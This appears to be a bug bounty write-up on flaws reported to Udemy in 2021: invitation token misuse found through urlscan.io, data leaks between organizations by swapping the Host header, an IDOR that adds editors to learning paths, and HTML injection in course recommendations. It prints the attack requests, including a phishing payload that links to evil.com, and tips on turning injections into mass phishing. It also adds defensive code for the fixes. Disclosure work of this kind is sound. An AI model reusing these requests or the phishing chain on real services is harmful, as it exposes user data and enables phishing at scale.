From URL Dump Digging to IDOR, BAC and Massive Phishing in Udemy

Hey All,

This is my first writeup since I kicked off my cyber security career, so let's start.

Recently I was trying some OSINT framework tools when I came across urlscan.io, a website scanner that checks a URL for signs of malware or phishing. All submitted scans are archived for public access, and you can search them by domain name or by a keyword from the URL. So I started searching for common websites like Twitter, Uber, Udemy… hoping to find private instances or pages that are less accessible to the public. I came to https://urlscan.io/search/#page.domain:udemy.com and some URLs caught my attention: *.udemy.com/?data=token and *.udemy.com/organization/accept-invitation/?email=token

Broken Access Control — Udemy

The bug was that anyone could claim these invitations without any extra verification that the person redeeming the invitation was the intended user.

Invitation Redeem

They fixed it by requiring an extra verification step.

Information Disclosure — Udemy

The Learning Paths feature lets you, as a member of a business organization (either a user or a moderator), create learning tracks and share them with others in the same organization only.

Every business organization has a handle or account name, which looks like handle.udemy.com, that distinguishes it from other organizations.

Disclosing Organizations' Learning Paths

GET /api-2.0/learning-paths/?page=1&page_size=20&fields[learning_path]=@default,is_user_enrolled,estimated_content_length,num_enrollments,folder_ids,is_owner_in_group&list_type=all&ordering=-created HTTP/1.1
Host: █████.udemy.com

HTTP/1.1 200 OK
{"count":30,"next":"█████","previous":null,"results":[{"_class":"learning_path","id":█████504,"title":"Ethical Hacking","description":"Path to becoming Ethical Hacker. Learning journey would include Web app hacking, N/W hacking, AD hacking, Privilege escalation and much more.","owner":{"_class":"user","id":█████6538,"display_name":"█████S","image_50x50":"*","initials":"SP"},"is_public":true,"editors":[{"_class":"user","id":█████6538,"display_name":"█████S","image_50x50":"█████","initials":"SP"}],"is_user_enrolled":false,"estimated_content_length":3172,"num_enrollments":2,"folder_ids":[],"is_owner_in_group":false}, ...]}

I changed the account name in the Host header to other organizations' account names and got all the learning paths created in those organizations, along with their members' data.

I tested the same attack vector against other API endpoints that, according to their API documentation, don't require an account id in the request.

Disclosing Trial Organizations' Status

GET /api-2.0/organization-trial/status/ HTTP/1.1
Host: █████.udemy.com

HTTP/1.1 200 OK
{"available_count": 5, "active_remaining_days": 0, "owner_email": "█████", "trial_limit_reached": false, "used_count": 0, "owner_name": "█████", "is_owner": false, "remaining_seats": 0}

Using the same attack vector, I changed the account name in the Host header to another organization's and got that organization's trial data.

Insecure Direct Object Reference — Udemy

PUT /api-2.0/learning-paths/█████886/permissions/ HTTP/1.1
Host: █████.udemy.com

{"added_editors_ids":[],"removed_editors_ids":[]}

I changed the learning path id in the request to a random one and added my own user id to added_editors_ids. The final request looks like this:

PUT /api-2.0/learning-paths/█████514/permissions/ HTTP/1.1
Host: █████.udemy.com

{"added_editors_ids":[152495920],"removed_editors_ids":[]}

HTTP/1.1 200 OK
{"results":[{"_class":"user","id":█████034,"display_name":"█████vschi","image_50x50":"█████","initials":"AP"},{"_class":"user","id":152495920,"display_name":"Mostafa Mamdoh","image_50x50":"█████","initials":"MM"}]}

I was able to add myself as an editor of any learning path, in the same or a different organization, and I could also remove any existing editor by putting their id in removed_editors_ids.
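The two authorization checks that the Host header and permissions findings above show were missing, written as an added defensive example that is not Udemy's code: the response is bound to the organization named in the Host header and to the caller's membership, and the learning path must belong to that same organization with the caller already holding rights on it. The handles, user ids, path ids and the udemy.com parent domain are constructed assumptions.

```python
# Added example (not Udemy's code): tenant binding and ownership checks that would
# have closed the Host-header disclosure and the learning-path id IDOR above.
# Organization handles, user ids, path ids and the parent domain are constructed.
BASE_DOMAIN = "udemy.com"  # assumed parent domain of the per-organization hosts

# constructed fixtures: two tenants, their members, and one learning path each
MEMBERS = {"acme": {101, 102}, "globex": {201}}
PATHS = {  # path id -> owning org handle, owner id, set of editor ids
    5041: {"org": "acme", "owner": 101, "editors": {102}},
    5142: {"org": "globex", "owner": 201, "editors": set()},
}

def tenant_for(host: str, user_id: int):
    """Resolve the organization from the Host header and confirm the caller is a
    member of it (the check the /learning-paths/ and /organization-trial/status/
    responses above lacked). Returns the handle, or None when refused."""
    handle, _, parent = host.split(":")[0].lower().partition(".")
    if parent != BASE_DOMAIN or user_id not in MEMBERS.get(handle, ()):
        return None
    return handle

def list_learning_paths(host: str, user_id: int):
    """GET /learning-paths/: results are filtered by the caller's own tenant only."""
    org = tenant_for(host, user_id)
    if org is None:
        return 403, "caller is not a member of this organization"
    return 200, sorted(pid for pid, p in PATHS.items() if p["org"] == org)

def update_editors(host, user_id, path_id, added=(), removed=()):
    """PUT /learning-paths/<id>/permissions/: the path must live in the caller's
    tenant and the caller must already be its owner or an editor."""
    org = tenant_for(host, user_id)
    if org is None:
        return 403, "caller is not a member of this organization"
    path = PATHS.get(path_id)
    # object must exist in this tenant; 404 also avoids leaking that other ids exist
    if path is None or path["org"] != org:
        return 404, "learning path not found in this organization"
    if user_id != path["owner"] and user_id not in path["editors"]:
        return 403, "only the owner or an editor may manage editors"
    if any(uid not in MEMBERS[org] for uid in (*added, *removed)):
        return 400, "editors must be members of the same organization"
    path["editors"].update(added)
    path["editors"].difference_update(removed)
    return 200, sorted(path["editors"])
```

Each handler returns an HTTP-style (status, body) pair so the refusals can be checked directly; in a real service the tenant lookup would come from the request's authenticated session rather than the fixture dicts.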

Possible Massive Phishing Attack Through HTML Injection

POST /api-2.0/share/course/█████/recommend/ HTTP/1.1

-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████388
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████382
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████580
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████083
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████288
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████988
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="message"
<h1>Hey █████</h1>Please go to https://evil.com/accept to redeem your invite <img src="https://pbs.twimg.com/profile_images/810954665202434052/_m3mPbHa_400x400.jpg" alt="Smiley face" width="42" height="42" style="vertical-align:bottom">
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="context"
ufb_clp
-----------------------------374017102511920071852193229569--

This feature allows you to recommend a course to several users at the same time. I added many user ids to the request, belonging to personal (non-business) accounts I had created normally from https://www.udemy.com/join/signup-popup/, and I received this mail:

Theoretically, I could have sent injected phishing content to all of their users (nearly 150,000,000 users at the time of reporting), personal or business ones, by iterating over all user ids, since the endpoint didn't implement rate limiting at that time.
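Two server-side controls for the recommend endpoint described above, as an added example that is not Udemy's code: the user-supplied message is HTML-escaped before it is placed in the mail template, so tags arrive as visible text, and a per-sender recipient cap bounds how many users one account can address per window. The template, the limits and the sample message are constructed for illustration.

```python
# Added example (not Udemy's code): render the "message" field as text, not markup,
# and cap recipients per sender so mass mailing of injected content is bounded.
# The template, limits and sample message below are constructed.
import html
from collections import deque

MAIL_TEMPLATE = (
    "<p>{sender} recommends the course <b>{course}</b> to you.</p>"
    '<blockquote style="white-space: pre-wrap">{message}</blockquote>'
)

def render_recommendation_mail(sender: str, course: str, message: str) -> str:
    """Escape every user-controlled field; an injected <h1> or <img> becomes text."""
    return MAIL_TEMPLATE.format(
        sender=html.escape(sender),
        course=html.escape(course),
        message=html.escape(message, quote=True),
    )

class RecipientLimiter:
    """Sliding-window cap on distinct recipients per sender. It does not block a
    legitimate recommendation, but makes bulk sending fail fast and stand out."""

    def __init__(self, max_recipients: int, window_seconds: int):
        self.max = max_recipients
        self.window = window_seconds
        self.sent = {}  # sender_id -> deque of (timestamp, recipient_count)

    def allow(self, sender_id: int, recipient_ids: list, now: float) -> bool:
        q = self.sent.setdefault(sender_id, deque())
        while q and now - q[0][0] >= self.window:  # drop entries outside the window
            q.popleft()
        used = sum(n for _, n in q)
        n = len(set(recipient_ids))  # duplicates in one request count once
        if n == 0 or used + n > self.max:
            return False
        q.append((now, n))
        return True

# constructed sample shaped like the injected message shown on the page
SAMPLE_MESSAGE = '<h1>Hey</h1>Please go to https://example.invalid/accept <img src="x">'
```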

Report Timeline:

  • March 3, 2021 — Vulnerabilities reported.
  • April 7, 2021 — Total bounties awarded: $1300
  • August 7, 2021 — Reports resolved

Tips:

  • Use public URL archives or scanners to recon for private instances or leaked tokens that belong to sensitive features; see https://osintframework.com/
  • Try to elevate the impact of your content injections by chaining them with phishing scenarios